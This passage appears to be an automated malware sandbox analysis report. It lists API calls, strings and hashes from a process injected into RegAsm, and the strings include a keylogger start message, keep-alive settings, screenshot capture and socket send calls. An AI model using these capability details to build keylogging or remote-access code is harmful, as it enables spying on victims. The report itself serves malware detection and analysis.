                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                                          • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                                          • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                          • __freea.LIBCMT ref: 0044AE30
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • __freea.LIBCMT ref: 0044AE39
                                                          • __freea.LIBCMT ref: 0044AE5E
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 3864826663-0
                                                          • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                          • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                          • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                                          • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C430
                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C44D
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C459
                                                          • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C46A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C477
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseHandle$CreatePointerWrite
                                                          • String ID: hpF
                                                          • API String ID: 1852769593-151379673
                                                          • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                          • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                                          • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                                          • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                                          APIs
                                                            • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                                            • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                                            • Part of subcall function 004135A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                                            • Part of subcall function 004135A6: RegQueryValueExA.KERNEL32 ref: 004135E7
                                                            • Part of subcall function 004135A6: RegCloseKey.KERNEL32(?), ref: 004135F2
                                                          • StrToIntA.SHLWAPI(00000000), ref: 0041B33C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                          • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                          • API String ID: 782494840-2070987746
                                                          • Opcode ID: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                          • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                                          • Opcode Fuzzy Hash: 4bb90c0f07e29b0526b62701d95bcfb2f6be5e0deda9af741838fbf4b4585177
                                                          • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,10006FFD,00000000,?,?,?,10008A72,?,?,00000100), ref: 1000887B
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,10008A72,?,?,00000100,5EFC4D8B,?,?), ref: 10008901
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 100089FB
                                                          • __freea.LIBCMT ref: 10008A08
                                                            • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                          • __freea.LIBCMT ref: 10008A11
                                                          • __freea.LIBCMT ref: 10008A36
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1414292761-0
                                                          • Opcode ID: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                          • Instruction ID: 3f57ce737592ef9202bcebfaa3f65c0582e3f3231b4dd00ae19a895c9b397c34
                                                          • Opcode Fuzzy Hash: bbd44e65680a142b819532ff26adde273e0ccd3bd0c95f1520c1a5c0857fc469
                                                          • Instruction Fuzzy Hash: 4F51CF72710216ABFB15CF60CC85EAB37A9FB417D0F11462AFC44D6148EB35EE509BA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CountEventTick
                                                          • String ID: !D@$NG
                                                          • API String ID: 180926312-2721294649
                                                          • Opcode ID: 75bac21156ea110eea48a0adfc395f7911200addc9eb246d5c8f79a0d9191bc2
                                                          • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                                          • Opcode Fuzzy Hash: 75bac21156ea110eea48a0adfc395f7911200addc9eb246d5c8f79a0d9191bc2
                                                          • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                                          APIs
                                                          • CreateThread.KERNEL32(00000000,00000000,0040A27D,?,00000000,00000000), ref: 0040A1FE
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A267,?,00000000,00000000), ref: 0040A20E
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A289,?,00000000,00000000), ref: 0040A21A
                                                            • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                                            • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread$LocalTimewsprintf
                                                          • String ID: Offline Keylogger Started
                                                          • API String ID: 465354869-4114347211
                                                          • Opcode ID: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
                                                          • Instruction ID: bcf1cfbdc14a627f6781ea3a40f7cea6448602225ce5b2be95dc640702f6c2bd
                                                          • Opcode Fuzzy Hash: bde4462d29761b0d23c786235d2939a769aa686a4d808022a739f1360b93890e
                                                          • Instruction Fuzzy Hash: DE1194B12003187AD220B7369C86CBB765DDA8139CB00057FF946222D2EA795D54CAFB
                                                          APIs
                                                          • GetLocalTime.KERNEL32(00000001,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404F81
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00474EE0,00475598,?,?,?,?,00415CD6,?,00000001), ref: 00404FCD
                                                          • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                          Strings
                                                          • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$EventLocalThreadTime
                                                          • String ID: KeepAlive | Enabled | Timeout:
                                                          • API String ID: 2532271599-1507639952
                                                          • Opcode ID: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                                                          • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                                          • Opcode Fuzzy Hash: 5b2464df5b8dac7f4146cdbfda56de71be1ea15fa094643bc8b0c6bbca94d29d
                                                          • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                                          APIs
                                                          • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                          • RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000), ref: 004137A6
                                                          • RegCloseKey.KERNEL32(?), ref: 004137B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateValue
                                                          • String ID: pth_unenc
                                                          • API String ID: 1818849710-4028850238
                                                          • Opcode ID: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                          • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                                          • Opcode Fuzzy Hash: 3ae23bf51bdae044d43d0241d7839713fa8c787b67a3ee745682b35b7168c146
                                                          • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                                          • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00404DD2
                                                          • CloseHandle.KERNEL32(00000000), ref: 00404DDB
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 3360349984-0
                                                          • Opcode ID: f9d5220b46ff8e20b781fb9760721100cc9265fad88895d0f7bb8892bc5cd132
                                                          • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                                          • Opcode Fuzzy Hash: f9d5220b46ff8e20b781fb9760721100cc9265fad88895d0f7bb8892bc5cd132
                                                          • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                            • Part of subcall function 1000C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleModuleProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2905821283-0
                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                          • Instruction ID: 210348daefc771ff09e919cc38fdfa0d839c8297c2798a32150270056baeab90
                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                          • Instruction Fuzzy Hash: 0301D22094574A38BA51D7B40C06EBA5FD8DB176E0B24D756F1408619BDDA08906C3AE
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,10001D66,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue), ref: 10005D13
                                                          • GetLastError.KERNEL32(?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000,00000364,?,10005BC8), ref: 10005D1F
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,10005C88,10001D66,00000000,00000000,00000000,?,10005E85,00000006,FlsSetValue,1000E190,FlsSetValue,00000000), ref: 10005D2D
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                          • Instruction ID: ab8c2af688280ff547417c348c7c3430721907d0b6a0cc88e9d35c15e8af339b
                                                          • Opcode Fuzzy Hash: 803c5c09655bb12e7a00387565e20d3af286ada8f732c439529cecb726329beb
                                                          • Instruction Fuzzy Hash: 59018436615732ABE7319B689C8CB4B7798EF056E2B214623F909D7158D731D801CAE0
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                                          • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad$ErrorLast
                                                          • String ID:
                                                          • API String ID: 3177248105-0
                                                          • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                          • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                                          • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                                          • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4D7
                                                          • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleReadSize
                                                          • String ID:
                                                          • API String ID: 3919263394-0
                                                          • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                          • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                                          • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                                          • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                                          APIs
                                                          • GdiplusStartup.GDIPLUS(he[,?,00000000,00000000), ref: 004187BF
                                                            • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00AB4960,00000010), ref: 004048E0
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: GdiplusStartupconnectsend
                                                          • String ID: he[$NG
                                                          • API String ID: 1957403310-2147989145
                                                          • Opcode ID: 9fb2190fd65b29098c095d0173a330c95cc82b0262c8a801bd3bbc3c081c939c
                                                          • Instruction ID: 7327f59b566e15a660d60aa82690027a46463592f46d402a66a7ce129b2a3f3c
                                                          • Opcode Fuzzy Hash: 9fb2190fd65b29098c095d0173a330c95cc82b0262c8a801bd3bbc3c081c939c
                                                          • Instruction Fuzzy Hash: 7641A2717042015BC208FB22D952ABEB396ABC0358F50453FF54A672D2EF7C5D4A869E
                                                          APIs
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BAA
                                                            • Part of subcall function 00418656: GdipLoadImageFromStream.GDIPLUS(?,?,?,00418AD1,00000000,?,?,?,?,00000000), ref: 0041866A
                                                          • SHCreateMemStream.SHLWAPI(00000000,00000000), ref: 00418BCF
                                                            • Part of subcall function 004186CB: GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B27,00000000,?,?), ref: 004186DD
                                                            • Part of subcall function 00418679: GdipDisposeImage.GDIPLUS(?,00418B82), ref: 00418682
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Stream$GdipImage$Create$DisposeFromLoadSave
                                                          • String ID: image/png
                                                          • API String ID: 1291196975-2966254431
                                                          • Opcode ID: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                          • Instruction ID: c6f894421d6f6d4ca6915e56eba1d7ff3797fde04a376feef2065c2e579c4a83
                                                          • Opcode Fuzzy Hash: a27ec27d9e18f0a906ecaac1dc19e5732830617660cf953b76ad9b2867ca9ec8
                                                          • Instruction Fuzzy Hash: 30219371204211AFC705EB61CC88CBFBBADEFCA754F10092EF54693161DB399945CBA6
                                                          APIs
                                                          • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC08,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0040D078
                                                          • GetLastError.KERNEL32 ref: 0040D083
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateErrorLastMutex
                                                          • String ID: SG
                                                          • API String ID: 1925916568-3189917014
                                                          • Opcode ID: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                          • Instruction ID: 95155ffd2f5cf2c34283977deb482d2843c3ccfb5002447f486bda260673b364
                                                          • Opcode Fuzzy Hash: 39599091def79051ab742ff046aa9e12e6026389991bc8d246940820909dc324
                                                          • Instruction Fuzzy Hash: 18D012B0604701EBD7181770ED5975839959744702F40487AB50BD99F1CBAC88908519
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                            • Part of subcall function 1000C7E6: GetModuleHandleA.KERNEL32(1000C7DD), ref: 1000C7E6
                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                            • Part of subcall function 1000C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleModuleProtectVirtual
                                                          • String ID:
                                                          • API String ID: 2905821283-0
                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                          • Instruction ID: abaa11d5974e3e1b05dfd32ec0224f7ddc3d76465740e120717e363e7a178845
                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                          • Instruction Fuzzy Hash: A921382140838A6FF711CBB44C05FA67FD8DB172E0F198696E040CB147DDA89845C3AE
                                                          APIs
                                                          • send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          • WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                          • SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: EventObjectSingleWaitsend
                                                          • String ID:
                                                          • API String ID: 3963590051-0
                                                          • Opcode ID: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                          • Instruction ID: 83b425c638d75041f18e819343fb0b0c123ba7f8272f9a3a5816098776915250
                                                          • Opcode Fuzzy Hash: 9fc3f5fbc76b769c61b094c1e0d5237dee77039eb0f94f08c61e3471faa40265
                                                          • Instruction Fuzzy Hash: A52126B2900119BBCB04ABA1DC95DEE773CFF14314B00452BF515B21E2EE79AA15C6A4
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C816
                                                          • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1000C7F4,1000C7DD), ref: 1000C82A
                                                          • GetModuleHandleA.KERNEL32(?,1000C7DD), ref: 1000C838
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual$HandleModule
                                                          • String ID:
                                                          • API String ID: 3519776433-0
                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
